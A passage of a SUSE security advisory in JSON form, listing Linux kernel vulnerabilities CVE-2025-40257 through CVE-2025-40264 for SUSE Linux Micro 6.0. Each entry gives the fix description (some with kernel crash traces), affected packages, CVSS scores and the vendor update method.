"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40262",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40262"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: imx_sc_key - fix memory corruption on unload\n\nThis is supposed to be \"priv\" but we accidentally pass \"\u0026priv\" which is\nan address in the stack and so it will lead to memory corruption when\nthe imx_sc_key_action() function is called. Remove the \u0026.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40262",
"url": "https://www.suse.com/security/cve/CVE-2025-40262"
},
{
"category": "external",
"summary": "SUSE Bug 1254840 for CVE-2025-40262",
"url": "https://bugzilla.suse.com/1254840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40262"
},
{
"cve": "CVE-2025-40263",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40263"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: cros_ec_keyb - fix an invalid memory access\n\nIf cros_ec_keyb_register_matrix() isn\u0027t called (due to\n`buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev-\u003eidev` remains\nNULL. An invalid memory access is observed in cros_ec_keyb_process()\nwhen receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work()\nin such case.\n\n Unable to handle kernel read from unreadable memory at virtual address 0000000000000028\n ...\n x3 : 0000000000000000 x2 : 0000000000000000\n x1 : 0000000000000000 x0 : 0000000000000000\n Call trace:\n input_event\n cros_ec_keyb_work\n blocking_notifier_call_chain\n ec_irq_thread\n\nIt\u0027s still unknown about why the kernel receives such malformed event,\nin any cases, the kernel shouldn\u0027t access `ckdev-\u003eidev` and friends if\nthe driver doesn\u0027t intend to initialize them.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40263",
"url": "https://www.suse.com/security/cve/CVE-2025-40263"
},
{
"category": "external",
"summary": "SUSE Bug 1255077 for CVE-2025-40263",
"url": "https://bugzilla.suse.com/1255077"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40263"
},
{
"cve": "CVE-2025-40264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbe2net: pass wrb_params in case of OS2BMC\n\nbe_insert_vlan_in_pkt() is called with the wrb_params argument being NULL\nat be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL\npointer when processing a workaround for specific packet, as commit\nbc0c3405abbb (\"be2net: fix a Tx stall bug caused by a specific ipv6\npacket\") states.\n\nThe correct way would be to pass the wrb_params from be_xmit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
